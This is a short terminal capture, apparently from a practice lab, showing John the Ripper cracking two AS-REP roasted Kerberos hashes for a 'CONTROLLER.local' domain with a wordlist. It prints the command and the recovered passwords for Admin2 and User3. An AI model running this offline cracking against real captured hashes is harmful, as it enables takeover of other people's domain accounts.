└─$ john --wordlist=./Pass.txt --format=krb5asrep asperoast_hashes.txt            
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@$$W0rd2        ($krb5asrep$Admin2@CONTROLLER.local)     
Password3        ($krb5asrep$User3@CONTROLLER.local)     
2g 0:00:00:00 DONE (2022-06-24 15:39) 200.0g/s 124000p/s 248000c/s 248000C/s 123456..hello123
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
